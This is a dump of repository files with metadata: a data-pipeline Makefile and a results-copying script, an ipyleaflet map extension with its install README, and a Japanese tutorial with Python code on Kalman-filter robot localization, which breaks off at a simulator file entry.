"text": ".PHONY: requirements\n\n#################################################################################\n# GLOBALS #\n#################################################################################\n\n\n\n#################################################################################\n# COMMANDS #\n#################################################################################\n\n## Install Python Dependencies\nrequirements: \n\t$(PYTHON_INTERPRETER) pip3 install -U pip setuptools wheel\n\t$(PYTHON_INTERPRETER) pip3 install -r requirements.txt\n\n## Create intermediate data \ncreate_intermediate_data:\n\t$(PYTHON_INTERPRETER) src/d02_intermediate/preprocess_0_shapefiles.py\n\n\n"
},
{
"alpha_fraction": 0.7452793717384338,
"alphanum_fraction": 0.7481695413589478,
"avg_line_length": 73.9565200805664,
"blob_id": "56b00f827e4182f04a2c82f027eaffce12c02472",
"content_id": "18915983137db00734f233382acc73b5522777ab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5190,
"license_type": "permissive",
"max_line_length": 166,
"num_lines": 69,
"path": "/src/d06_reporting/copy_results_to_paper_repo.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# this script moves the useful outputs to the paper repository.\n\nimport pandas as pd\nimport shutil\nimport os\nimport sys\n\n# from path\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# to overleaf file\noverleaf_path = '/Users/shenhaowang/Dropbox (MIT)/Apps/Overleaf/Gravity model for econ and transport networks/'\n\n# from & to file\nfile_dic = {}\n\n# tables\nfile_dic[model_output_path+'model1_table_od_duration.txt'] = overleaf_path+'tables/'+'model1_table_od_duration.txt'\nfile_dic[model_output_path+'model2_table_consumption_amount_mcc_source.txt'] = overleaf_path+'tables/'+'model2_table_consumption_amount_mcc_source.txt'\nfile_dic[model_output_path+'model2_table_consumption_count_mcc_source.txt'] = overleaf_path+'tables/'+'model2_table_consumption_count_mcc_source.txt'\nfile_dic[model_output_path+'model2_table_flow_agents.txt'] = overleaf_path+'tables/'+'model2_table_flow_agents.txt'\nfile_dic[model_output_path+'model3_table_median_income_per_job_aud_persons.txt'] = overleaf_path+'tables/'+'model3_table_median_income_per_job_aud_persons.txt'\n\n# figs\n#\nfile_dic[report_path+'local_environment/'+'Adelaide_area.png'] = overleaf_path+'figs/'+'Adelaide_area.png'\n#\nfile_dic[report_path+'node_visual/'+'node_socioecon_median_income.png'] = overleaf_path+'figs/'+'node_socioecon_median_income.png'\nfile_dic[report_path+'node_visual/'+'node_socioecon_pop_density.png'] = overleaf_path+'figs/'+'node_socioecon_pop_density.png'\nfile_dic[report_path+'node_visual/'+'node_poi_count_agg_density.png'] = overleaf_path+'figs/'+'node_poi_count_agg_density.png'\nfile_dic[report_path+'node_visual/'+'node_poi_entropy_agg_density.png'] = overleaf_path+'figs/'+'node_poi_entropy_agg_density.png'\n#\nfile_dic[report_path+'edge_visual/'+'edge_consumption_amount_mcc_source.png'] = overleaf_path+'figs/'+'edge_consumption_amount_mcc_source.png'\nfile_dic[report_path+'edge_visual/'+'edge_consumption_count_mcc_source.png'] = overleaf_path+'figs/'+'edge_consumption_count_mcc_source.png'\nfile_dic[report_path+'edge_visual/'+'edge_flow_agents.png'] = overleaf_path+'figs/'+'edge_flow_agents.png'\nfile_dic[report_path+'edge_visual/'+'edge_consumption_amount_mcc_source_sparse.png'] = overleaf_path+'figs/'+'edge_consumption_amount_mcc_source_sparse.png'\nfile_dic[report_path+'edge_visual/'+'edge_consumption_count_mcc_source_sparse.png'] = overleaf_path+'figs/'+'edge_consumption_count_mcc_source_sparse.png'\nfile_dic[report_path+'edge_visual/'+'edge_flow_agents_sparse.png'] = overleaf_path+'figs/'+'edge_flow_agents_sparse.png'\n#\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_consumption_amount.png'] = overleaf_path+'figs/'+'pred_consumption_amount.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_consumption_count.png'] = overleaf_path+'figs/'+'pred_consumption_count.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_flow.png'] = overleaf_path+'figs/'+'pred_flow.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_inc.png'] = overleaf_path+'figs/'+'pred_inc.png'\nfile_dic[report_path+'model_visual_pred_actual/'+'pred_travel_time.png'] = overleaf_path+'figs/'+'pred_travel_time.png'\n#\nfile_dic[report_path+'policy_simulation/'+'simulation_consumption_amount_increase.png'] = overleaf_path + 'figs/'+'simulation_consumption_amount_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_consumption_count_increase.png'] = overleaf_path + 'figs/'+'simulation_consumption_count_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_flow_agents_increase.png'] = overleaf_path + 'figs/'+'simulation_flow_agents_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_od_duration_save.png'] = overleaf_path + 'figs/'+'simulation_od_duration_save.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_income_increase.png'] = overleaf_path + 'figs/'+'simulation_income_increase.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_income_increase_ratio.png'] = overleaf_path + 'figs/'+'simulation_income_increase_ratio.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_diversity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'simulation_diversity_based_consumption_opp.png'\nfile_dic[report_path+'policy_simulation/'+'simulation_amenity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'simulation_amenity_based_consumption_opp.png'\n#\nfile_dic[report_path+'accessibility_metrics/'+'amenity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'amenity_based_consumption_opp.png'\nfile_dic[report_path+'accessibility_metrics/'+'diversity_based_consumption_opp.png'] = overleaf_path + 'figs/'+'diversity_based_consumption_opp.png'\n#\nfile_dic[report_path+'descriptive_visual/'+'flow.png'] = overleaf_path + 'figs/'+'descriptive_flow.png'\nfile_dic[report_path+'descriptive_visual/'+'socioecon.png'] = overleaf_path + 'figs/'+'descriptive_socioecon.png'\nfile_dic[report_path+'descriptive_visual/'+'travel.png'] = overleaf_path + 'figs/'+'descriptive_travel.png'\n\n\n\n# copy and paste\nfor key_ in file_dic.keys():\n from_file = key_\n target_file = file_dic[key_]\n shutil.copy2(from_file, target_file)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
}
] | 22 |
zacharyselk/IPyLeafletExtention
|
https://github.com/zacharyselk/IPyLeafletExtention
|
92569c01890b44240f85813a8a0b81d17b576e78
|
c63f0d03726df51b45324bb6c847d33b7b7e3719
|
28084cc5d73651eb7aef6c74e9a6fb6ab8a14033
|
refs/heads/master
| 2020-03-19T07:17:08.908312 | 2018-06-05T01:59:59 | 2018-06-05T01:59:59 | 136,101,589 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 39.53333282470703,
"blob_id": "814c247a1cb80ffbcd748469e4252568f13b2daf",
"content_id": "82c085fa210943cc0e6fddc2352956f666792f74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 15,
"path": "/lib/constants.py",
"repo_name": "zacharyselk/IPyLeafletExtention",
"src_encoding": "UTF-8",
"text": "HTML_BUTTON = '''<html>\n<div>\n<p id='station_name'>%s</p>\n<p id='lat'>Latitude: %s<br>Longitude: %s</p>\n<p id='index' hidden>%s</p>\n\n<button type='button' onclick='var var_station = document.getElementById(\"station_name\").innerHTML; \nvar var_index = document.getElementById(\"index\").innerHTML; \nvar command = \"SET_GLOBAL_SHOW_STATION(\" + var_index + \")\"; \nconsole.log(\"Executing Command: \" + command); \nvar kernel = IPython.notebook.kernel; kernel.execute(command); \ncomm = Jupyter.notebook.kernel.comm_manager.new_comm(\"_button_\");\ncomm.send({\"hello\": \"goodbye\"});'>Show in table</button>\n</div>\n</html>'''\n"
},
{
"alpha_fraction": 0.7759562730789185,
"alphanum_fraction": 0.7773224115371704,
"avg_line_length": 42.05882263183594,
"blob_id": "377d70af768de3c15879d98e2efe6dabadfd83e8",
"content_id": "fa52df91a259b18531e02bac5687f42b9dcc9df9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 17,
"path": "/README.md",
"repo_name": "zacharyselk/IPyLeafletExtention",
"src_encoding": "UTF-8",
"text": "## Overview\nThis is a library that is a basic extension to the ipyleaflet library as well as provides some documentation/examples of how to use the ipyleaflet library in general. \n\n## Download and Use\nFirst you will need to download the depenancies, with<br>\n ```pip install ipyleaflet tqdm requests beautifulsoup4```\n then ipyleaflet will need to be enabled to work with jupyter notebooks, with<br>\n ```jupyter nbextension enable --py ipyleaflet```\n \n\nTo download simply clone the repository with<br>\n```git clone https://github.com/zacharyselk/IPyLeafletExtention.git```\n\nAfter it is downloaded move the contents of lib into your project directory, then it can be imported with \n```py\nfrom MapExtention import MapExtention\n```\n"
}
] | 2 |
shuhei55/PROBABILISTIC-ROBOTICS
|
https://github.com/shuhei55/PROBABILISTIC-ROBOTICS
|
c369a324173b1c1f5abca70292928e50326e3568
|
7fcd55341468221419b8542bb9905c80eec74ef9
|
8b1439e260f68227124a13b0db467ee0e6a017c5
|
refs/heads/master
| 2020-05-30T06:11:35.084158 | 2020-02-01T03:55:31 | 2020-02-01T03:55:31 | 189,575,496 | 9 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4164205491542816,
"alphanum_fraction": 0.4743059575557709,
"avg_line_length": 33.551021575927734,
"blob_id": "29827589fd130ffb134ce412275a463905e39798",
"content_id": "cd21c36b16a5ccce00280e8d9e3fef334c32517e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1693,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 49,
"path": "/single_ekf/hoge.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\n\n\nclass Map:\n DT = 10 #ms\n def __init__(self):\n self.x = np.array([[0,0,0]])\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def set_pos(self, pos):\n self.x = np.array(pos)\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def update(self, sim):\n self.x += np.array([[0,0,sim.get_gyro() * self.DT]])\n self.x += (np.array([[np.cos(-self.x[0][2]),-np.sin(-self.x[0][2])],[np.sin(-self.x[0][2]),np.cos(-self.x[0][2])],[0,0]]) @ sim.get_enc()).T\n self.Pxy += np.array([[1600,0,0],\n [0,1600,0],\n [0,0,0.00000001]])\n\n\n def differential(self, angle):\n return np.array([[-(1./np.sin(angle+self.x[0][2])), 0, -self.x[0][0]*(-np.cos(angle+self.x[0][2])/(np.sin(angle+self.x[0][2])**2))]])\n\n def h(self, angle):\n return -self.x[0][0]/np.sin(angle+self.x[0][2])\n\n def update2(self, sim):\n angle = 1.57\n y = sim.get_single_wall_length(angle)\n if y == np.inf:\n pass\n else :\n #y_p = - self.x[0] / np.float64(np.sin(angle + self.x[2]))\n filter_R = np.array([[100]])\n jacobian = self.differential(angle)\n kalman_gain = (self.Pxy @ jacobian.T) / (jacobian @ self.Pxy @ jacobian.T + filter_R)\n self.x += kalman_gain.T * (y - self.h(angle))\n self.Pxy = (1 - kalman_gain @ jacobian) * self.Pxy\n"
},
{
"alpha_fraction": 0.3918918967247009,
"alphanum_fraction": 0.6081081032752991,
"avg_line_length": 36,
"blob_id": "422008330cdfd27e20e96bb66a79b288a4a85ce0",
"content_id": "e19a4340028e0becc09623ef9df4ad1ce8a797a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 296,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 8,
"path": "/config/config.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "from drawer import drawer\n\ndef init(drawer):\n img = drawer.draw_line([-4000,-4000], [-4000,4000],\"k\")\n img = drawer.draw_line([4000,4000], [4000,-4000],\"k\")\n img = drawer.draw_line([4000,4000], [-4000,4000],\"k\")\n img = drawer.draw_line([4000,-4000], [-4000,-4000],\"k\")\n return img\n"
},
{
"alpha_fraction": 0.7432187795639038,
"alphanum_fraction": 0.7938517332077026,
"avg_line_length": 34.068294525146484,
"blob_id": "908145c9f38e2db969f35da892bc71eb580fdcac",
"content_id": "d07cc00ef5c60f6429726178f0ea1b326ce43386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13907,
"license_type": "no_license",
"max_line_length": 653,
"num_lines": 205,
"path": "/lec/README.md",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "# 自己位置推定講習\n* 基本的な自己位置推定をしてみたり\n* ベイズの定理を用いた自己位置推定をしてみたりしましょう\n## 環境構築\n* このプログラムは普通のUbuntu18.04とWSLのUbuntu18.04でのみ動作確認しています(Macは知らん〇ね)\n#### grip\n* Markdownを読むソフトがない人は個人的なおすすめはgripというソフトです\n```\n$ sudo apt update\n$ sudo apt install grip\n```\n * このディレクトリの中でgrip -bとコマンドを打てば勝手にウェブブラウザが起動してgithubで見ているように簡単にREADME.mdが読めます\n#### python3\n* このプロジェクトはpython3を使います\n* python3の環境構築は人それぞれで好きにやってください(jupyter-notebookやanacondaやpyenvなどなど)\n* 一番やってはいけないのはanacondaでやってたのに以下の方法もやるとかです(コンフリクトします)\n* ある程度理解しているなら好きなようにやって良いですが、とりあえず以下の方法でをおすすめします\n* python3のインストール\n```\n$ sudo apt update\n$ sudo apt install python3 python3-pip python-pip\n$ sudo pip3 install numpy matplotlib\n```\n#### WSL\n* WSLの人は自分でなんとかしてほしいですが一応僕の環境で動いた対処方は書いておきます\n * [参考ページ](http://ai-gaminglife.hatenablog.com/entry/2019/04/29/204841)\n * XmingまたはVcXsrvなどをインストールする\n * さっきのコマンドに追加で以下のコマンドをする\n```\n$ sudo apt install python3-tk\n```\n#### 動作確認\n* 以下のコマンドでdefault.pyが動きしたの写真のようになればよい(赤の点のプロットの仕方は異なります)\n```\n$ python3 default.py\n```\n\n* 左上のツールを使うと拡大できたりするのでもっと見やすくなると思います\n\n## シミュレーター\n* 詳しくはシミュレーターの関数一覧などを読めば良いがどのようなシミュレーターかについて\n* シミュレーターはx,y,thetaの3変数のとそれの一回微分と二回微分の状態量をもちます\n* update関数が呼ばれると一定の分散をもちながらそれぞれ積分して時間更新されます\n* 制御周期は10msとしています\n* エンコーダーはマシン座標系でx方向とy方向に非常に精度高く並行についているとします\n* エンコーダーの返す値は差分であり、速度ではありません\n* gyroセンサーもマシンに剛に固定されており精度高くマシンの角速度を返してくれるとします\n## よくある決定論的自己位置推定\n* とりあえず環境構築でシミュレーターを動かすことはできたでしょうか\n* じゃあさっそく簡単な自己位置推定をしてみましょう\n* シミュレーターの関数に実装されているget\\_enc関数とget\\_gyro関数を用いて自己位置推定をしてみましょう\n\n```\ntheta += get_gyro() * dt\nX += (回転行列[-theta]) * get_enc()\n```\n* 簡単なモデルなら上の式みたいな感じでしょうか\n* 実装してみましょう\n```python3:main.py\n#! /usr/bin/python3\n\nfrom sim import simulator\nfrom drawer import drawer\nimport numpy as np\nfrom config import config\n\ndef plot(data):\n global theta, X\n sim.update()\n #自己位置推定の更新\n theta += sim.get_gyro() * 10\n X += np.array([[np.cos(-theta),-np.sin(-theta)],[np.sin(-theta), np.cos(-theta)]]) @ sim.get_enc() #@は内積を意味する(回転行列をかけているだけ)\n ball_img = drawer.draw_point(sim.x,sim.y)\n ball_img = drawer.draw_point(X[0][0], X[1][0], \"g\")\n return ball_img\n\nsim = simulator.Sim(0.,0.,1.,1.,0.,0.) #シミュレーターのコンストラクタ\n\n#自己位置の初期値\ntheta = 0.\nX = np.array([[0.,0.]]).T\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n```\n\n* どうでしょうかそれっぽく自己位置推定できたのではないでしょうか?\n* でも当然ですがだんだんずれていってしまいますね\n* モデルをもっと正確にしたりと、もう少し改善の方法はありますがこれがエンコーダーとジャイロセンサーでの自己位置推定の限界でしょう\n* こっからよくするならば、測距センサーやラインセンサーなどを用いるしかありません\n* 測距センサーはシミュレーターに実装されているのでそれを使ってみるのも良いと思います\n* しかし、測距センサーをうまく自己位置補正につかえるでしょうか?\n* でっち上げで読んでいる柵を予測して適当に自己位置を書き換えることで補正できるでしょう(大体の大学はこういうことしてるんじゃないかなあ)\n* でもマシンが予測しない位置にいたり、帰ってきた値がノイズでおかしくなってたりたりしたときの対応が面倒くさいですね\n\n## 確率論的自己位置推定\n* まずここからは決定論的に自己位置を決めるのではなくて、確率論的に自己位置を推定します\n* どういうことかというと、自己位置の状態量(例えばx,y,theta)とその値の分散を自己位置の情報として常に持ち、それらを時間ごとに更新していくというものです\n* つまり、マシンの自己位置はだいたいこの値を中心としてこの分散の中のどこかにはいるだろうといった感じで自己位置推定を行います\n* 試しに上で行った自己位置推定を確率論的にしたものが下のコードです\n```python3:main.py\n#! /usr/bin/python3\n\nfrom sim import simulator\nfrom drawer import drawer\nimport numpy as np\nfrom config import config\n\ndef plot(data):\n global x, y, theta,Ptheta,Px,Py #pythonのグローバル変数を使うときはこうやって宣言してあげなければいけない\n sim.update()\n theta += sim.get_gyro() * 10\n x += (np.array([[np.cos(-theta),-np.sin(-theta)],[np.sin(-theta), np.cos(-theta)]]) @ sim.get_enc())[0][0]\n y += (np.array([[np.cos(-theta),-np.sin(-theta)],[np.sin(-theta), np.cos(-theta)]]) @ sim.get_enc())[1][0]\n #分散も更新する\n #更新の量はセンサーの精度などから適当に決める\n Ptheta += 0.0001\n Px += 100.\n Py += 100.\n ball_img = drawer.draw_point(sim.x,sim.y)\n ball_img = drawer.draw_point(x,y,\"g\")\n ball_img = drawer.draw_circle(x,y,np.sqrt(Px),np.sqrt(Py)) #分散は二乗なので同じ次元に落として表示する\n return ball_img\n\nsim = simulator.Sim(0.,0.,1.,1.,0.,0.) #シミュレーターのコンストラクタ\n\n#自己位置\nx = 0.\ny = 0.\ntheta = 0.\n#自己位置の分散\nPx = 10.\nPy = 10.\nPtheta = 0.0001\n\ndrawer = drawer.Drawing(plot)\n\nball_img = config.init(drawer)\n\ndrawer.show()\n```\n* このコードで動かしてみると下のように最初にやった自己位置推定に時間が経つごとに大きくなる分散が追加されただけでしょう\n* 赤が実際の自己位置で緑が推定した位置、青の円が分散です\n* しかし赤い点が分散の中に入っているので推定自体は間違っていないのです\n* この分散を小さくして推定の緑の点を赤の実際の点に近づけるためには何かしら(ラインセンサーや測距センサーなど)の補正を行ってやる必要が出てきます\n* しかし、世の中のセンサーは単純に自己位置が帰ってくるわけではなく、距離だけであったりするのでそれらのデータをいい感じに自己位置に落とし込んであげなければいけません\n* 以下の自己位置推定の方法ではそれらの追加データをいい感じに今までの自己位置と組み合わせてより良い感じの自己位置を求めることが出来る方法です\n\n## カルマンフィルターを用いた自己位置推定\n* 実際の世界にはありえないモデルですが線形モデルで一回考えてみましょう\n* 定期的に一定の分散は乗っているもののマシンの自己位置がなぜか手に入るモデルを考えましょう\n* [このサイト](https://qiita.com/MoriKen/items/0c80ef75749977767b43)などを参考にしてみましょう\n* 上のサイトが非常に直感的にわかりやく書かれているのでここでは説明しません\n* kf/hogeに実装されているのでコードを読んでみて下さい\n* 実際に10回ごとに自己位置が補正されて推定点が実際の点に近づき分散の円が小さくなっているのがわかりましたか?\n \n\n## SingleModelEKF(Extended Kalman Filter)\n* 上で用いた定期的にマシンの自己位置がそのまま手に入ることなどは現実世界ではまずないので、今回は測距センサーを用いて柵を読んで自己位置の補正を行ってみましょう\n* ここではEKFというカルマンフィルターを非線形拡張したアルゴリズムを用います\n* [このサイト](https://qiita.com/Crafty_as_a_Fox/items/55448e2ed9ce0f340814)などを参考にしましょう\n* あとは[確率ロボティクス](https://www.amazon.co.jp/%E7%A2%BA%E7%8E%87%E3%83%AD%E3%83%9C%E3%83%86%E3%82%A3%E3%82%AF%E3%82%B9-%E3%83%97%E3%83%AC%E3%83%9F%E3%82%A2%E3%83%A0%E3%83%96%E3%83%83%E3%82%AF%E3%82%B9%E7%89%88-Sebastian-Thrun/dp/4839952981/ref=sr_1_1?adgrpid=57386821630&gclid=Cj0KCQjww7HsBRDkARIsAARsIT42112TVnENbOvkkIqk5Docou4Q_m81SLI7YIrpAYgU0pNVst1jGOIaAgMcEALw_wcB&hvadid=338541146619&hvdev=c&hvlocphy=1009279&hvnetw=g&hvpos=1t1&hvqmt=e&hvrand=7674351478518788021&hvtargid=kwd-335165749908&hydadcr=16038_11170849&jp-ad-ap=0&keywords=%E7%A2%BA%E7%8E%87%E3%83%AD%E3%83%9C%E3%83%86%E3%82%A3%E3%82%AF%E3%82%B9&qid=1569489131&s=gateway&sr=8-1)などを参考にすると良いでしょう\n* ただ、複数の柵があるとどの柵を読んでいるのかの判定などが面倒くさいので最初は一つだけ柵があるモデルを推定しましょう\n* single\\_ekf/hogeに実装されているのでコードを読んでみて下さい\n* 実際に10回ごとに自己位置が補正されているのがわかるでしょう\n* しかしここで実装されているのはy軸に存在する柵を読んでいるだけなのでx方向の自己位置は補正されますがy方向の自己位置は補正されていませんね\n\n\n## MultiModelEKF(Extended Kalman Filter)\n* では今度は複数の柵を読んでどの柵を読んでいるかも推定した上で自己位置を補正できるようなものを実装してみましょう\n* multi\\_model\\_ekf/hogeに実装されているのでコードを読んでみて下さい\n* これで一般的な自己位置推定ができましたね(ぱちぱち)\n* 説明ゼロで草\n\n\n## UKF(Unscented Kalman Filter)\n* EKFと肩を並べるカルマンフィルターを非線形拡張したアルゴリズムです\n* EKFと比較すると\n * 2 * 状態の次元 + 1 個の点をサンプリングして時間発展させるため、EKFに比べて遅い\n * EKFではヤコビアンを計算する必要がありましたが、UKFではその必要がないという点で使いやすい\n* まだ実装してないです\n* [この論文](https://www.jstage.jst.go.jp/article/isciesci/50/7/50_KJ00004329717/_article/-char/ja/)を読めばわかります\n* さらに、正定値性を保って計算出来る優れたアルゴリズム(Square Root Unscented Kalman Filter)があり、[この論文](https://ieeexplore.ieee.org/document/940586)を読むとわかると思います\n * ただし[QR](http://nalab.mind.meiji.ac.jp/~mk/labo/text/eigenvalues/node32.html)分解が必要になるため、スタンダードなUKFよりも遅い\n* 実際に実装するならば後者のアルゴリズムを用いるべきでしょう\n\n## EIF(Extended Information Filter)\n* 推定におけるカルマンフィルターの双対問題である情報フィルターの非線形拡張版です\n* カルマンフィルターは時間発展が速いのに対し情報フィルターは補正段が速いので状況によって使い分けるのが良いと思われます\n* 僕もまだわかってないので実装できない\n* 確率ロボティクスを読むとわかるよ\n\n## パーティクルフィルター\n* 確率ロボティクスを読むとわかるよ\n\n## 終わりに\n* ここまで自己位置推定のためにこれらの方法を実装してきましたが、実はこれらのアルゴリズムは別に自己位置推定だけで使うわけではありません\n* 自己位置の状態量をリアルタイムに更新することで、自己位置推定を行ってきましたが、これらの状態量をマシンのパラメーターにすることもできます\n* たとえば、例えば、トルク定数や無負荷時電流などのマシンのパラメータがありました\n* あのようなパラメータも今までと同じようにモデルを立てて、実際に動かしてみて入力した電流値と計測した値を用いることで上のようなアルゴリズムを用いれば推定することができます\n* よくやる方法だと最小二乗法などで、入力値や測定値からパラメーターを計算しますが、これらの方法だと、様々で複雑な計測値(モデル)であっても計算できるし、分散をみることで計算されたパラメータ(状態量)の確かさなども簡単にわかります\n* もしかしたら、簡単なパラメーター推定練習のものも作るかもしれません\n"
},
{
"alpha_fraction": 0.41313067078590393,
"alphanum_fraction": 0.4614734947681427,
"avg_line_length": 36.29921340942383,
"blob_id": "444531cf10a4027a6e787e4ad5c77caef8aa3461",
"content_id": "58fd7ee2610b83249bc861e2a9c7d591036522f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4737,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 127,
"path": "/multi_model_ekf/hoge.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport numpy as np\nimport numpy.linalg as LA\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport math\nimport random\n\n\n\nclass Map:\n DT = 10 #ms\n def __init__(self):\n self.x = np.array([[0,0,0]])\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def set_pos(self, pos):\n self.x = np.array(pos)\n self.Pxy = np.array([[10,0,0],\n [0,10,0],\n [0,0,0.0001]])\n\n def update(self, sim):\n self.x += np.array([[0,0,sim.get_gyro() * self.DT]])\n self.x += (np.array([[np.cos(-self.x[0][2]),-np.sin(-self.x[0][2])],[np.sin(-self.x[0][2]),np.cos(-self.x[0][2])],[0,0]]) @ sim.get_enc()).T\n self.Pxy += np.array([[1600,0,0],\n [0,1600,0],\n [0,0,0.00000001]])\n\n\n def differential_1(self, angle):\n return np.array([[-(1./np.sin(angle+self.x[0][2])), 0, (4000-self.x[0][0])*(-np.cos(angle+self.x[0][2])/(np.sin(angle+self.x[0][2])**2))]])\n\n def differential_2(self, angle):\n return np.array([[-(1./np.sin(angle+self.x[0][2])), 0, (-4000-self.x[0][0])*(-np.cos(angle+self.x[0][2])/(np.sin(angle+self.x[0][2])**2))]])\n\n def differential_3(self, angle):\n return np.array([[0, -(1./np.cos(angle+self.x[0][2])), (4000-self.x[0][1])*(np.sin(angle+self.x[0][2])/(np.cos(angle+self.x[0][2])**2))]])\n\n def differential_4(self, angle):\n return np.array([[0, -(1./np.cos(angle+self.x[0][2])), (-4000-self.x[0][1])*(np.sin(angle+self.x[0][2])/(np.cos(angle+self.x[0][2])**2))]])\n\n def h_1(self, angle):\n tmp = (4000-self.x[0][0])/np.sin(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def h_2(self, angle):\n tmp = (-4000-self.x[0][0])/np.sin(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def h_3(self, angle):\n tmp = (4000-self.x[0][1])/np.cos(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def h_4(self, angle):\n tmp = (-4000-self.x[0][1])/np.cos(angle+self.x[0][2])\n if tmp < 0 or tmp == np.inf:\n return np.inf\n else:\n return tmp\n\n def update2(self, sim):\n angle = 1.57\n #angle = 0\n filter_R = np.array([[1600]])\n log_P_tmp = -0.5*np.log(2*np.pi)-0.5*np.log(np.abs(LA.det(filter_R)))\n y = sim.get_multi_wall_length(angle)\n if y == np.inf:\n pass\n else :\n h_y = np.array([self.h_1(angle),self.h_2(angle),self.h_3(angle),self.h_4(angle)])\n print(h_y,y)\n log_P = log_P_tmp-0.5*((y-h_y)*(1/filter_R)*(y-h_y))\n #print(log_P)\n if log_P.max() < -10:\n pass\n else :\n argmax = log_P.argmax()\n if argmax == 0:\n jacobian = self.differential_1(angle)\n elif argmax == 1:\n jacobian = self.differential_2(angle)\n elif argmax == 2:\n jacobian = self.differential_3(angle)\n else :\n jacobian = self.differential_4(angle)\n kalman_gain = (self.Pxy @ jacobian.T) / (jacobian @ self.Pxy @ jacobian.T + filter_R)\n print(\"hoge\")\n self.x += kalman_gain.T * (y - h_y[argmax])\n self.Pxy = (1 - kalman_gain @ jacobian) * self.Pxy\n #angle = 1.57\n angle = 3.14\n y = sim.get_multi_wall_length(angle)\n if y == np.inf:\n pass\n else :\n h_y = np.array([self.h_1(angle),self.h_2(angle),self.h_3(angle),self.h_4(angle)])\n log_P = log_P_tmp-0.5*((y-h_y)*(1/filter_R)*(y-h_y))\n print(h_y,y)\n if log_P.max() < -10:\n print(\"piyo\")\n pass\n else :\n argmax = log_P.argmax()\n if argmax == 0:\n jacobian = self.differential_1(angle)\n elif argmax == 1:\n jacobian = self.differential_2(angle)\n elif argmax == 2:\n jacobian = self.differential_3(angle)\n else :\n jacobian = self.differential_4(angle)\n kalman_gain = (self.Pxy @ jacobian.T) / (jacobian @ self.Pxy @ jacobian.T + filter_R)\n print(\"fuga\")\n self.x += kalman_gain.T * (y - h_y[argmax])\n self.Pxy = (1 - kalman_gain @ jacobian) * self.Pxy\n"
},
{
"alpha_fraction": 0.4538840055465698,
"alphanum_fraction": 0.5018189549446106,
"avg_line_length": 31.22758674621582,
"blob_id": "9df46573909100fdfa7fe29c956934eead2e2b2b",
"content_id": "a2e865ffc63e17b846830042b4a1c2b6e8fba03a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5055,
"license_type": "no_license",
"max_line_length": 244,
"num_lines": 145,
"path": "/sim/simulator.py",
"repo_name": "shuhei55/PROBABILISTIC-ROBOTICS",
"src_encoding": "UTF-8",
